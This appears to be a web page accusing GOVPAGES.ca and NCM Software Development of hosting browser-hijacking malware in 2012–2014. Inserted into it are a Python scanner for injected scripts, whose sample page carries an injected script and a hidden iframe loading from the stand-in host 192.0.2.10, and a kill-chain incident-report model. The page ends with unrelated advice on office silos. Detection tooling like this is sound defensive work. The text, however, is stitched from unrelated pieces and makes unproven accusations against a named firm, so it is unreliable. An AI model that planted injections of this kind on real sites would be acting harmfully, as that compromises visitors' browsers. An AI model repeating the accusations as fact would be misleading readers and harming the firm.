Source: Having a security management process is a must for all Government of Canada clients. The GOVPAGES.ca network server [o/o by veteran GOC client NCM Software Development Inc] is found to have hosted MALICIOUS SOFTWARE on two of its business web sites over a 32 month period during 2012, 2013, 2014. The intent of the GOVPAGES.ca hosted malware during these 32 months was to hi-jack visiting web browsers, breach their network security, steal digital property and take OS control of visiting computer networks. Continuous warnings [screenshots provided] were issued by Google Chrome, Microsoft IE, and Mozilla Firefox during this prolonged period of time. Government of Canada “cross-agency priority” [CAP] goals have cyber security at the top of its agenda. This subsequent report follows Public Safety Canada interdiction Oct 2014 and concerns host server GOVPAGES.ca, two NCM Software Development Inc registered internet domains [governmentcontacts.com and governmentmailinglists.com], NCM’s weak IT security posture and NCM’s persistent attempts to redirect visiting network browsers to IP 220.127.116.11 [a known (Russian orig/Romanian admin) distributor of malicious software]. This illicit activity carried out during 2012, 2013 and 2014 is corroborated by court admissible evidence.
Source: Google Chrome blocking access to NCM’s ‘browser hi-jacking site’ governmentcontacts.com while depicting a cyber crime in progress, zeros and ones falling to the ground as digital forensic evidence. Screenshot captured May 2013.
Network breaches happen daily in the digital age, so it is imperative that we stand vigilant in our fight against persistent malware threats, while supporting standards that safeguard data privacy and enhance the effective communication of cyber threat incidents and identified intrusion indicators.
Rapid response time is priority. Dwell time must be kept to a minimum.
In Canada, unprecedented cyber-attacks have targeted Defence Research and Development Canada and two key Government of Canada organizations compromised by criminal hackers. The impact suffered has included giving foreign hackers access to highly classified Federal information and, at the time, forced the Finance Department and Treasury Board — the GOC’s two main economic nerve centres — off the internet.
The recent revelation [Oct 2014] that a Russian crime ring amassed the world’s largest known collection of stolen Internet credentials, including 1.2 billion username and password combinations and over 500 million email addresses, simply reinforces the fact that cybercrime is something that affects both private and public sector organizations of every size. Spyware and malware are among an organization’s biggest threats and often go unnoticed until it’s too late, due to their elusive nature.
Malware is commonly implemented with a simple one-line script, injected into a compromised website and made to look like normal code. Challenging breeds of malware continue to evolve and become more dangerous while reaching new levels of complexity.
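The paragraph above describes the usual shape of a web-site compromise: a single injected line that blends in with legitimate markup and silently redirects the visitor's browser elsewhere. The following is an added example, not code from the original page or from any organization named on it, showing the kind of check a site owner can run over their own published HTML to catch such injections before a browser vendor flags the site. It assumes a hypothetical allow-list of hosts the site legitimately loads resources from (`ALLOWED_HOSTS`); the sample page and the 192.0.2.10 address in it are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) site is expected to load scripts and frames from.
ALLOWED_HOSTS = {"www.example.gov.invalid", "cdn.example.gov.invalid"}

_BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Constructs typical of injected one-liners: payloads decoded at run time and
# script-driven redirects. Heuristic only; tune the list to the site checked.
_SUSPICIOUS_INLINE = re.compile(
    r"(unescape\s*\(|eval\s*\(|String\.fromCharCode|"
    r"(?:window|document|top)\.location(?:\.href)?\s*=)", re.I)


class _Collector(HTMLParser):
    """Collects (line, kind, detail) findings while parsing the page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_start = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "embed", "object"):
            src = a.get("src") or a.get("data")
            if src:
                self._check_src(tag, src)
        if tag == "script":
            self._in_script = True
            self._script_start = self.getpos()[0]
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if "display:none" in style or "visibility:hidden" in style or tiny:
                self.findings.append((self.getpos()[0], "hidden-iframe", src or ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands us the whole body of an inline <script> as one chunk.
        if self._in_script and _SUSPICIOUS_INLINE.search(data):
            self.findings.append(
                (self._script_start, "suspicious-inline-script", data.strip()[:80]))

    def _check_src(self, tag, src):
        host = urlparse(src).hostname
        if host is None:
            return  # relative URL: same origin, nothing to flag
        if _BARE_IP.match(host):
            self.findings.append((self.getpos()[0], f"{tag}-src-bare-ip", src))
        elif host not in ALLOWED_HOSTS:
            self.findings.append((self.getpos()[0], f"{tag}-src-unknown-host", src))


def scan_html(html: str):
    """Return a list of (line_number, finding_kind, detail) for suspicious markup."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a contact-directory page with one injected script and one
# injected 1x1 iframe, both pointing at a bare IP outside the allow-list.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.gov.invalid/app.js"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//192.0.2.10/in.php%22%3E'));</script>
</head><body>
<h1>Contact directory</h1>
<iframe src="http://192.0.2.10/count.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>var i=0;</script>
</body></html>"""

if __name__ == "__main__":
    for line, kind, detail in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {kind}: {detail}")
```

Running the scan over the sample page reports the decoded-at-runtime `document.write` on line 3 and the hidden iframe on line 6 twice (once for the bare-IP source, once for its 1x1 hidden geometry); the legitimate CDN script and the harmless inline script produce nothing. Run against a site's own templates as part of deployment, or against periodic fetches of the live pages, the same check shows a change the moment an injection lands instead of months later when a browser starts warning visitors.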
The Train Has Left the Station
It is an unfortunate fact that both private and public sector networks are under constant attack and every organization connected to the internet is a constant target for network intrusion; therefore dwell time and response time are a critical IT/IS priority.
Stealthy criminals infiltrate networks without consent, in several hostile and intrusive ways, including the installation of rootkits, which provide masked administrator-level intrusion to gain root or privileged access and control of the OS. One leading anti-rootkit utility is available from Kaspersky Lab in Russia [it detects and removes the known rootkits TDSS, SST, Pihar, ZeroAccess, Sinowal, Whistler, Phanta, Trup, Stoned, RLoader, Cmoser, Cidox]; Russian Federation laws apply.
When a network breach is first discovered, every moment is critical. Not only should the organization shut down the network attack, but it must work to minimize resulting collateral damage — and it must do so quickly. Once an intruder has gained super user access, they now control the system.
Malware is defined by its Hidden Malicious Intent.
It’s a race in real time. It’s a race in calendar time. Sometimes, a network may not detect malware until after an infection occurs and vulnerabilities are exploited.
Professionals maintain internal controls, with security updating systems to ensure compliance with industry standards, thus avoiding administrative, criminal or civil liability against the organization and its directors.
The Honourable Vic Toews, P.C., Q.C., M.P. Minister of Public Safety
“These criminal groups are breaking into our computer systems, searching through our files, and causing our systems to crash. They are stealing our industrial and national security secrets, and our personal identities”.
Attacks on government and client networks are not only becoming more complex, but also more sophisticated. A GAO study finds that reported attacks increased 782% between 2006 and 2012. Cyber security is one of the most pressing concerns for the public sector. Attacks have been increasing in both volume and speed as cyber criminals attempt to gain access to government networks.
9,084 incidents of cyber crime were reported by Canadian police services in 2012 alone.
“Recent media attention has highlighted the proliferation of security breaches affecting us all. These security failures have not only resulted in significant expense to the organizations affected, but have significantly damaged trust and reputation.
The sensitive data embedded within your networks and systems is a high value target to hackers.”
Patrick Malcolm, Digital Forensics and Cyber Security Expert Trainer, National Capital Region [Ottawa, Canada]
M-Trends Threat report: A View from the Front Lines
Cyber security has gone from a niche IT issue to a boardroom priority and Cross-Agency-Priority (CAP) for business and government organizations.
Executive Order — Promoting Private Sector Cybersecurity Information Sharing
U.S. President Obama signed an executive order that aims to better share cybersecurity threat information.
Canadian Cyber Incident Response Centre (CCIRC) Partners
An organization’s network security is fundamental and must not be treated as optional. CCIRC partners include government, private sector organizations, security researchers and the national cyber security incident response teams (CSIRTs) in other countries. These partnerships enable threat information sharing that is critical to preventing, preparing for, responding to, and recovering from cyber incidents. There are just too many slimy players out there that leverage malware crafted to evoke trust when none is warranted, but do nothing more than steal your assets.
Below is a ‘Report Template’ for Threat Intelligence and Incident Response
When handling intrusions, incident responders often struggle with obtaining and organizing the intelligence related to the actions taken by the intruder and the targeted organizations. Examining all aspects of the event and communicating with internal and external constituents is a challenge in such strenuous circumstances.
The following template is a Threat Intelligence and Incident Response Report which aims to ease this burden. This report provides a framework for capturing the key details and documenting them in a comprehensive, well-structured manner. Zeltser Security Corp – https://zeltser.com/cyber-threat-intel-and-ir-report-template/
This template leverages several models in the cyber threat intelligence (CTI) domain, such as the Intrusion Kill Chain, Campaign Correlation, the Courses of Action Matrix and the Diamond Model. The use of these frameworks helps guide threat intelligence gathering efforts and inform incident response actions.
Download the Report Template
The template is distributed according to the Creative Commons Attribution license (CC BY 4.0), which basically allows you to use it in any way you wish, including commercial purposes, as long as you credit Lenny Zeltser for the creation of the template.
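The three paragraphs above list the models the report template is built on (the Intrusion Kill Chain, the Courses of Action matrix and the Diamond Model) without showing how they fit together for a concrete incident. The following is an added example, not part of the template or of Zeltser Security Corp's material, that models a report in those terms: the kill-chain phases and action columns are the ones from the Hutchins, Cloppert and Amin paper that introduced the kill chain and the matrix, the Diamond vertices are the four from the Diamond Model, and the incident filled in is a constructed web-site-compromise scenario with placeholder values. The `gaps()` check is the practical payoff: it lists phases where the intruder was observed but no control detects or denies them, which is where dwell time accumulates.

```python
from dataclasses import dataclass, field

# Intrusion Kill Chain phases and Courses of Action columns (Hutchins et al., 2011).
KILL_CHAIN = ("reconnaissance", "weaponization", "delivery", "exploitation",
              "installation", "command_and_control", "actions_on_objectives")
COURSES_OF_ACTION = ("detect", "deny", "disrupt", "degrade", "deceive", "destroy")


@dataclass
class Indicator:
    phase: str            # kill-chain phase the indicator belongs to
    description: str      # what was observed
    courses: dict = field(default_factory=dict)  # action -> control that implements it


@dataclass
class IncidentReport:
    campaign: str
    # Diamond Model vertices
    adversary: str = "unknown"
    capability: str = ""
    infrastructure: str = ""
    victim: str = ""
    indicators: list = field(default_factory=list)

    def add(self, phase, description, **courses):
        """Record an indicator together with the courses of action taken against it."""
        if phase not in KILL_CHAIN:
            raise ValueError(f"unknown kill-chain phase: {phase}")
        for action in courses:
            if action not in COURSES_OF_ACTION:
                raise ValueError(f"unknown course of action: {action}")
        self.indicators.append(Indicator(phase, description, dict(courses)))

    def matrix(self):
        """Courses of Action matrix: phase -> action -> list of controls."""
        m = {p: {c: [] for c in COURSES_OF_ACTION} for p in KILL_CHAIN}
        for ind in self.indicators:
            for action, control in ind.courses.items():
                m[ind.phase][action].append(control)
        return m

    def gaps(self):
        """Phases where the intruder was observed but nothing detects or denies them."""
        observed = {i.phase for i in self.indicators}
        m = self.matrix()
        return [p for p in KILL_CHAIN
                if p in observed and not (m[p]["detect"] or m[p]["deny"])]

    def render(self):
        """Plain-text matrix for the body of the report."""
        m = self.matrix()
        width = max(len(p) for p in KILL_CHAIN)
        lines = [f"Campaign: {self.campaign}",
                 f"Adversary: {self.adversary} | Capability: {self.capability}",
                 f"Infrastructure: {self.infrastructure} | Victim: {self.victim}", ""]
        for p in KILL_CHAIN:
            cells = [f"{c}={len(m[p][c])}" for c in COURSES_OF_ACTION]
            lines.append(f"{p:<{width}}  " + "  ".join(cells))
        return "\n".join(lines)


def build_sample_report():
    """Constructed scenario: a hosted business site serving an injected redirect."""
    r = IncidentReport(
        campaign="CONSTRUCTED-web-redirect",
        adversary="unknown",
        capability="injected redirect script on compromised site",
        infrastructure="third-party IP hosting exploit pages (placeholder)",
        victim="visitors of a hosted business web site")
    r.add("delivery", "hidden iframe injected into page template",
          detect="web content integrity check", deny="proxy blocklist for redirect host")
    r.add("exploitation", "browser plugin exploit served by redirect host",
          deny="browser and plugin patching", degrade="click-to-play for plugins")
    r.add("installation", "dropper written to user profile",
          detect="endpoint alert on new autostart entry")
    r.add("command_and_control", "periodic HTTP beacon to redirect host")
    return r


if __name__ == "__main__":
    report = build_sample_report()
    print(report.render())
    print("\nUncovered phases:", report.gaps())
```

In the constructed scenario the beacon at the command-and-control phase has an indicator but no course of action against it, so `gaps()` returns that phase alone; the report writer then knows exactly which row of the matrix still needs a control before the incident can be closed.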
As cyber criminals become more sophisticated and adept in exploiting information technology, it becomes even more important for both private and public sector organizations to develop a risk mitigation strategy to detect, attribute and filter out persistent, malicious threats and adversary operators from our online communities.
How many opportunity dollars have been missed by your company because you don’t use enough information properly, to see the big picture?
Silos are barriers between departments.
Building a team that works well together is the first step an organization must take in order to have any chance of success. Even in the most well-intentioned teams, silo walls can appear, causing departments to work against each other. It’s one of the most frustrating things you can go through as a business.
- Compensation plans that put an emphasis on different things
- Finger pointing
- Assuming the other department means harm with every move they make
- Reliving the past
- Using the term “my people”
- Excessive delays
- Lobbying for personal interest
- Unwillingness to pitch in
- Snide remarks
- Back-channel backbiting
- Saying “That’s not my job.”
Silos organically form when there is no common theme for the office: an ultimate short- and long-term goal, which can be called a thematic goal. All actions should be directed at hitting that thematic goal.